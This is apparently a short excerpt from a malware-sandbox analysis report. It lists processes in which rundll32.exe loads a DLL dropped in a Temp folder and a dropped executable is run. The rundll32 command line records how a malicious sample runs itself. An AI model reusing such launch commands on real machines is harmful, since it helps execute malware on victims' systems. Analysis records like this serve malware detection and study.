C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\A894.dll,DllRegisterServer {41B64016-FF23-41ED-916B-82E18061D7E8}1⤵
- Loads dropped DLL
PID:3972
-
C:\Users\Admin\AppData\Local\Temp\55A4.exeC:\Users\Admin\AppData\Local\Temp\55A4.exe1⤵
- Executes dropped EXE
PID:3284